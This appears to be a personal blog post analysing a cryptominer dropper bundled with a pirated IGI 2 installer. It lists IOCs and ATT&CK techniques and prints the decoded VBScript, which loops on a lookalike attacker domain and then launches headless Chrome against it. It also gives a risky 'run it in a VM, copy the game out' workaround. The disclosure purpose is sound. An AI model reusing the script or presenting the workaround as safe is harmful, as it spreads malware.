The Target: IGI 2 - Covert Strike (2003)
I wanted to play an old game. I found it on a site called Ocean of Games.
The site looked normal. Screenshots. Instructions. Comments. It looked legitimate. It was not.
This is not a game site. It is a malware distribution network disguised as an archive.
Security analysts have confirmed:
- 18 indicators of compromise
- 11 MITRE ATT&CK techniques
- 5 threat categories
If you download from Ocean of Games, you are not downloading a game. You are downloading a cryptominer dropper wrapped in nostalgia.
The Infection
I downloaded IGI 2. I followed their instructions: "Step 1: Disable Windows Defender."
I played 4 missions. Then BSOD. Then days of recovery.
then i had-
- Dead pen drive
- Crashed server
- Hardware failure
- Complete OS reinstall for malware fix
- Countless errors and wasted time
The malware didn't just infect my computer. It derailed my life.
The Hunting Ground: Virtual Machine
I decided to fight back. Not with antivirus. With strategy.
I set up a virtual machine (VM) — an isolated, disposable computer inside my real computer. The malware cannot escape a VM. It is a cage.
What you need:
- VirtualBox (free, open-source)
- A Windows ISO
- The infected game installer
What you do:
- Create a VM
- Install Windows (no product key needed)
- Disable Windows Defender inside the VM (let the malware win inside the cage)
- Download the game from Ocean of Games inside the VM
- Do not run the installer yet
The Password Was '123'
The downloaded file is a ZIP. Inside, you will find:
| File | What it is |
|---|---|
| Step 0 - AVENGERS_AIO_v2.5.0.rar | Malware dropper (ignore) |
| Step 1 - Disable Defender.rar | Disables Windows Defender (ignore) |
| Step 2 - Extract Setup.rar | Password-protected archive (the game + malware installer) |
| Password.txt | Contains the password: 123 |
Yes. The password is 123. They didn't even try.
The Execution
Extract Step 2 - Extract Setup.rar with password 123. You will get Step 3 - Setup_Install_Game.exe.
Run this installer inside the VM. It will install the game. It will also install the malware. That is fine. The VM is disposable.
After installation, locate the game folder (usually C:\IGI2_Game). Copy the entire folder to your real system using a shared folder or USB drive.
Then delete the VM. The malware dies with it. Your real system never touched it.
The Evidence (Full Technical Breakdown)
Malware Components
| File | Purpose |
|---|---|
| WindowsService.exe | Main payload launcher |
| Windows Updates service.vbs | VBScript that runs the miner |
| encode.vbs | Converts VBS to VBE (encoded, harder to detect) |
Decoded VBScript (from the malware)
On Error Resume Next
Sub Pause(NSeconds)
Wscript.Sleep(NSeconds*3000)
End Sub
Dim visualcpp
Set visualcpp = CreateObject("WScript.Shell")
counter = True
While counter = True
website = "www.google.com.739471594492594.windows-display-service.com"
checkstring = "ping -n 1 -w 300 " & website
status = visualcpp.Run(checkstring, 0 , True)
If status = 0 Then
counter = False
Else
Pause(21)
End If
Wend
returncodestatus = "1"
returncodestatus = visualcpp.run("chrome --headless --disable-gpu --remote-debugging-port=9222 http://www.google.com.739471594492594.windows-display-service.com",0,false)
MITRE ATT&CK Techniques
| Tactic | Technique |
|---|---|
| Execution | User Execution (T1204) |
| Persistence | Scheduled Task (T1053) |
| Defense Evasion | Disable Windows Defender (T1562) |
| Discovery | Process Discovery (T1057) |
| Impact | Resource Hijacking (T1496) — cryptomining |
Indicators of Compromise (IOCs)
-
Domains:
www.google.com.739471594492594.windows-display-service.com -
Files:
MicrosoftRuntimeUpdate.vbe,Windows Updates service.vbs -
Processes:
chrome.exe(headless),firefox.exe(headless) -
Password:
123 -
Archive:
Step 2 - Extract Setup.rar
How to Extract Safely (For Anyone Facing Similar Malware)
If you are not comfortable with malware analysis, do not attempt to extract manually. But if you have the skills and patience, here is the method:
- Set up a VM. Use VirtualBox. It is free.
- Install Windows in the VM. Activate it.
- Disable Windows Defender inside the VM. Yes, turn it off. The malware needs to succeed inside the cage.
- Download the file from the sketchy site inside the VM.
- Extract the ZIP. Use 7-Zip.
-
Find Password.txt. The password is often
123. - Extract the password-protected archive.
- Run the installer inside the VM. Let the malware execute. The VM is disposable.
- After installation, copy the game folder to your real system.
- Delete the VM. The malware dies.
Do not run the installer on your real system. Do not disable Windows Defender on your real system. Do not trust any file from Ocean of Games.
The Aftermath
The malware is dead. The game is extracted. My real system is clean. Now i play the game on my real system.
What You Should Do
For Individuals
- Never disable Windows Defender. Not for a game crack. Not for anything.
- Use a VM for sketchy downloads.
- Keep backups. Encrypted backups. Offline backups.
- Switch to Linux. It is free, and your keyboard will work.
- Trust no one. Not a sketchy website. Not me. Verify everything.
For Law Enforcement & Cybersecurity Professionals
The evidence is public:
-
Domains:
oceanofgames.com,www.google.com.739471594492594.windows-display-service.com -
Password:
123 - File hashes: Available upon request
This is not a sophisticated operation. It is a volume-based malware farm. But it has infected thousands of computers. It is still online. It is still distributing malware.
I have filed reports with Porkbun (domain registrar) and Cloudflare. I have reported to Google Safe Browsing and Microsoft SmartScreen.
You are holding the evidence. File the reports. Take down the site. Protect the next person who searches for IGI 2.
Visit my website and download my legitimate software madde by me on- https://origin-inc-pvt-ltd.github.io/originempire.github.io/
Top comments (0)